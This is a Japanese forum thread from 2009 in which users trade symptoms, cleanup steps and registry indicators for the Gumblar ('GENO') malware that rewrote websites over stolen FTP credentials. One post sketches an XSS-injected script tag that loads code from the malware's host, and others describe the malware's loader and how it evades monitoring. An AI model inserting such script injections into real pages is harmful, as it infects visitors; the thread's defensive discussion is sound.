・再起動するとcmd.exe起動不可(エクスプローラー起動）。→現行版では発生しないらしい
　CMD.exe動作不良の派生結果として、SP+メーカーの動作不良（ダウンロードはできるが統合作成できず）。
・レジストリエディタ起動不可（別名にリネームで起動）。→現行版では発生しないらしい
・どのセキュリティソフトも検知はしなかったが、オンラインゲームの不正プログラム防止の
　nProtectの動作を阻害したらしく、RagnarokOnlineの起動ができなくなったのを確認。
　→現行版でも動作不良を起こすかは不明。

新規の情報としては、nProtect GameGuardと干渉したことがあるってことだけ。
現行版でも干渉するかどうかは不明。

>>778
それ両方のサイトが同じドメインだったりしないよね？
NoScriptはドメイン単位での許可不許可だから
複数のタブに同じドメインのサイト開いてると、
どれか1つで許可すると全部で許可されたことになるよ

ふと思ったんだが
XSSで script src="//martuz" を入れられたら、そのサイト見た時に同じ事おきるよな

XSS対策されてない時点で云々ってのは置いておいて

感染PC持ってるけどsystem32.exeはない感じだよ

http://127.0.0.1/

ここ見て開けたらとてつもなくやばいという情報を聞きましたがどうなんでしょう？

うちのＸＰはsqlsodbc.chmが1323バイトで感染濃厚。
system32.exeの存在なし

>>795
山田オルタナティブでググレカス

>>795
自分でIIS入れたりしていないなら、ヤバいだろうね。

>>795
127.0.0.1はローカルループバック（自PCを見るって事）なんでそれが開くという事は
あなたのPCは鯖として公開されているっつー事です。
自分でWeb鯖なり公開してるのであれば正常ですが、そんな事した覚えが無い場合は…ね？判るでしょ？

>>794
うん、こんなわかりやすい名前のファイルは、これまでの傾向からして
作らないと思う。

>>764
ありがとう
愛してる

お前らがGENO GENO言うから「日本のGENO = Gumlar」と補足されたじゃねーかｗ
ttp://blog.scansafe.com/journal/2009/5/18/japans-geno-gumblar.html

それからついでに・・・。

PC３台所有中１台感染
サイトは5サイト管理中3サイト感染

感染PCはネットワークから物理的に遮断している状態
PC２台は推奨されている対策を実施

3サイトの内訳
HTMLのみのサイト
MTのサイト
Modxのサイト

MTとModxは未感染のPCからFTPパスを変更しレンサバのファイルマネージャーより該当コードを削除
HTMのみのサイトは未感染のPCからFTPパスを変更せずにファイルマネージャーから該当コードを削除

するとFTPパスを変更していないサイトは該当コード削除後１時間ほどで改ざんされました。
改ざんの更新日時をみると２分間の間に20ほどのファイルが改ざんされています。
階層は３層目まででした。
そこで、再び改ざんされたサイトもFTPパスを変更した後該当コードを削除したところ
その後の改ざんは確認できません。

ちなみにCMS系の改ざんは吐き出したHTMLやPHPを改ざんされるほか
システム系のPHPも改ざんされていました。

>>794
感染ＰＣのsqlsodbc.chmは書き換えられてるよね？

> So folks doing Gumblar research via the Web would do well to add GENO in as a search term.
いいぞいいぞw

世界にGENOの醜態を発信！

>>802
GENOが世界に羽ばたいたな！
宣伝した礼ぐらい欲しいものだ。

>>804
ばっちり書き換えられてます。

>>797-799
ありがとうございます！

追伸
５サイト中３サイト感染したが
感染していない２サイトは

PC感染後FTP接続を行ってないサイトでした。

ちなみにFFTPを使用しています。

>>803
＞システム系のPHPも
その辺嫌だねぇ

>>808
じゃあ今更だがやはり感染を確認するにはsqlsodbc.chmを見るしかないのか

>>765
調べたけどウチには無いなあ

GENOｗｗｗｗｗｗｗｗ恥ずかしすぎるｗｗｗｗｗｗ
俺なら改名するか店たたむｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

484 名前：名無しさん＠お腹いっぱい。[] 投稿日：2009/05/19(火) 12:48:03
GENOって
ttp://www.itmedia.co.jp/news/articles/0905/19/news022.html
ここ見るとJSRedir-Rだよね？

ttp://www.avira.com/it/threats/section/vdfhistory/ivdf_no/7.01.03.183/7.01.03.183.html
iVDF version 7.01.03.183 detailsでリストに
JS/Redir.R
ってあるから対応してるってこと？


Avira AntiVirも怒涛のアップデートでついに対応していたらしい。

>>815
・異なるベンダー間で同じ名称になることはほぼ無い。
・仮に同じ物として、「JS」と付くとおり検知したのはJavaScriptだが
　これはほぼ無限のバリエーションがあるので全て撃墜できるとは限らない。

そうでしたか。
まあ対応への第一歩と見ておきます

>>789
とりあえず感染元は判るかな？(アドレス晒す時はドットを●なり■なりで置換して二次感染防げるようにしてね)
今までの流れからしてここでがらっと変えてくるのもなんか違うと思うから
おそらく感染元に別件のトロイﾄﾞﾛｯﾊﾟ仕掛けられてたんじゃねーかと推測…

GENOの海外の感染ブログ発見した。
Googleによって
このサイトはコンピュータに損害を与える可能性があります。
3時間前 投稿者: Jeremy
になってたけどどうしよう。

>>819
放っといていいんじゃねーの?
Googleに有害判定されたらさすがにバカでも過疎ブログでも気づくと思われ

>803
検証ありがとうございます
参考になります

>>820
Uｒｌはいらないの？

>>802
わははははは^^;;

サイト名ですかこれ。って思われてる様子 そんくらいでちょうどいいｗ
影響力があったからこそ名が残り、そして、吊し上げには当たらない。くらいでいいんだ

まあ、GENOたんも素人集団じゃないんだから、ほんましっかりせえよと言いたいがｗ

>>822
>>687

>>803
検証乙
ちなみにHP改竄はIPどっから(cn？他？)だったのかな？ログ残ってたら教えて欲しい

>>802
ワロタｗ

>>823
GENOが素人に毛がはえた程度
に思えてきた

そういえば改竄IPの情報は１，２箇所でアメリカからとしか見てないな
それこそ感染者の多い同人板で改竄IPの情報集められないかな？

vm三つ作って感染pc、感染サイト、lvやcnサイトの代理って出来んかのう
うまくすれば感染したpcやサイトから洩れる情報が判るかも知れない気がする・・・ｷｶﾞ・・ｽ・ｷ

>>828
協力を求めたいとこだが…改竄された鯖のアクセスログを〜とか言って理解して貰えるのかがｗ

>>828
どうやればそれが分かるのか、とかが分かれば協力する奴もいると思うよ

初心者の質問で申し訳ないですが、現在ブラウザはIE、火狐共にスクリプトをoffにしています。
ハンゲームをやる時はIEのスクリプトを許可するか、火狐のNoScriptで
サイトを一時的に許可もしくはハンゲームのサイトを許可にしてやれば大丈夫でしょうか？

Adblock Plusがあるのに、頑張ってNoScriptを使わなくてもいい気がする。

>>832
韓国経由で感染します

>>832
http://namidame.2ch.net/mmoqa/
http://jfk.2ch.net/netgame/

>>828
ウィンドウズのアップデートすら図解つきで説明しないとだめ、してても質問がくる場所だぞ。
場所の性質上、無知な大人だけじゃなくて本物のリア小リア中もいるから仕方ないんだけど
おじいちゃんおばあちゃんにPC教えるような苦行に耐える覚悟がないと…
それより普通のまとめサイトにIPとれないかって書いてもらうほうがいいと思う

>>828
同人板は感染者は多いみたいけど、協力は得られるかなぁ…
多くの感染者はもともとセキュリティに関心が無いんだろうし
サイト消して、クリーンインスコして、パス変えて、やるべき事さえやったら
あとはもうウイルスに関わり合いたくもないって感じじゃなかろうか。
PC詳しくない人はそもそも、感染方法の確認だけでも
「まとめ見てもサッパリ意味がわからない」って手間取るし。
ややこしいことにわざわざ協力してくれる人は少ないかも

のろのろ書いてる間に同じようなレスが既に沢山付いてた　すまん

流石にWindows7RC-OSでの情報は無いか

>>839
とりあえずGENOについてはVista(UAC ON)以降のWinOS(鯖向け含む)は対象外、との話

検体の入手に成功してる人はadobeのバージョンどうなってる？

>>840
ﾄﾝｸｽ。
問題になってるsqlsodbc.chmの標準サイズがわからなかったから、正直ちと焦ってたぜ

>>839
NT6.0以上のカーネルはスクリプトで弾いてる

>>839
スクリプトでNT6.xを蹴ってるんだってば。
NT5.0 = 2000
NT5.1 = XP
NT5.2 = XP64 Server2003
↑アウト
↓セーフ
NT6.0 = Vista Server2008
NT6.1 = 7

gumlarって名前は覚えにくいし
GENOの方がいいな

書かれてあったことはすべてやって感染していないと思うが、サイトの更新するのが怖い。

同人板で協力を仰ぐのは無理か・・・
わかっていそうな人ならここも見ていそうだから自主申告してくれるのを待つしかないか

bぬけてないか

>>845
覚えにくいのは確かなようだなｗ
○gumblar　×gumlar

このスレ開こうとするとavastが反応するのですが、どうしてですか？

>>849
そもそもこれなんて読むんだ
ギャンブラー？ガンプラー？

ごめん >>802 打つ時にb抜けた
キー配列的にgumblerは打ちにくいんだよね…

>>847
まとめだけをサイトに貼ってる人もいるから記載されれば同人板以外からも協力得られるかも知れない

>>829
昨日から試してるんだけど。
感染VMにFWやら各種のsniffingツールやら入れて監視しようとすると
動作を止めたり自分自身を消したりするんだよね。

とりあえず
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux
に書き込まれるファイルが起点となって動作しているのは確実で、
こいつさえ殺してやれば少なくとも主要な機能は止まる。
殺し方としては、gnome氏の書かれている方法でOK。
要はSafe Modeで起動して、レジストリに書かれているファイルを適当に書き換えて
壊す。で、再起動後にレジストリを正常値に書き直す。

本体を呼び出すローダー部分がカーネルドライバなもんで、挙動を追いかけにくい。

また間違った
もう嫌だ

>850

>737
>738

どのサイトのオンラインスキャンが確実ですか？

ようやくバスターの更新が来たぞ

>>854
snifferを自作しろとの神からのお告げだろ

植民地政策で同人板を乗っ取っておいて

「俺男だけど同人板は野蛮なネトウヨキモオタ男だらけ」
「俺男だけど平和な腐女子は皆801板に篭ってるぞ」

だってよ

>>847
いけるかもって意見もあるだろう
最初から聞く気ないんじゃないのか

同人板にも詳しい人はいるみたいだし、理解して協力してくれる人いると思う

でも今ちらっと見たらまだセキュ板と戦ってるから
今向こうで書くと巻き込まれるかもしれない

>>857
残念ながら確実なものはひとつもない。
オンラインスキャンかけても現時点ではほとんど無駄。
つか、手元の4種はIEではSymantecやAdobeのサイトに繋がらない。
Firefoxだと繋がる。

多分こっちが低レベルな質問責めでげんなりしてるように
向こうも叩きに巻き込まれてげんなりして協力しようにもできない人
いるんじゃないかな

どこかで協力者募集できればいいんだけどな

>>854
DllMainですべて仕事してるだけ PEファイルなんだが、EXEじゃないんだな
ただし、自分をいったん、FileIOで読み直して、そこに制御を移してるはず

※なぜ俺が小出しかというと、最新版を全読破してないから。しかし、今もそんなかわらんだろ

>>860
あの板は実質801板に乗っ取られてるようなもんだから今更
腐ジャンルと大規模厨ジャンル以外はジャンルスレすら立たないのがいい証拠
ジャンルのスレなんてあってもなくてもいい物だからなくても別に構わないがな

>>861
向こうのGENOスレ見てきたらこれ以上混乱させたくなくなった
今でさえ真面目にまとめ作ってる連中のレスとか埋もれそうだ
情報募集の声をかけるとしても、もう少し落ち着いてからの方が良いいかなと

携帯から失礼。
サイト持ちの腐だけどできる限り協力するよ。
何すればいい？

こっちで向こうの話する人にもうんざりだな

同人なんてほっとけよ
あの惨状見た上で同人に協力頼もうとする奴って何なの？
馬鹿なの？死ぬの？

そうだね。そろそろ雑談は控えるか他でやった方がいいかも。

取り敢えず、金澤烏鶏庵（ukokkeiのとこ）は、対応中ですとの返答来ました。（他の人が既に除去確認済みの模様）

１７箇所位報告入れて、対応の連絡きたのは４〜５件てとこかな。返答無しでこっそり対応してるとこも幾つか。
返事はいらないけど、どこも対応をしっかりしてくれればそれでいいや。

でも、なにも無かった風を装うのは名称つけられたGENOみたいに評判落とすだけだと思うな。
訪問者への告知をもしっかり行なって、始めて対応完了だと思う。

>>825
ゴメン
外でてきちゃった
帰ったら報告するよ

「表示の登録されている拡張子は表示しない」のチェックが外れているか
確認。外れていない場合は外す。

↑
これは何の意味があるの？

>>868 とりあえず、このスレで待機。いやまじで。とりあえず乙

>>854
てことは、HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\
にauxというキーがなければとりあえずは安心しといていいのかな？

>>873
拡張子を表示していないと初心者が混乱するから念のため書いてあるだけだろうね。
「あれ！？書いてあるファイル名と違う！」と混乱するのが目に見えているから。

>>875
auxはデフォである。値がwdmaud.drvだったらとりあえずOK。

janeでみてたら「>>レス番号」の番号が＋100されてたんだけど。ウイルス？バグ？なぜか直った。

>>724のチェックページがバージョンアップしたみたい
>>※オマケの精度がちょっとだけ上がりました(2009-05-19 14:30現在)

コピペのコピペで失礼

257 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/19(火) 14:30:13
ttp://www■arad■jp
ネクソン　アラド戦記公式HP
安全の為、ピリオドを■にしとくけど、GENOチェッカーで800%って出る。
ここを開かないとゲーム出来ないんだが、マジで感染してるのかな？
アラド＼(^o^)／

>>875
いや、通常はauxのキーは存在する。正常ならサウンド系が割り当てなんで
Windows 2000 : mmdrv.dll
Windows XP : wdmaud.drv
(ドライバーによっては違います、要確認)

>>877
俺のはキーも値もないみたいだから安心しとくよ。

ウィルスバスター２００９は対応してるの？

おれも無いから安心

>>881
aux存在しないな、おれの

どうやったら感染出来るか教えて下さい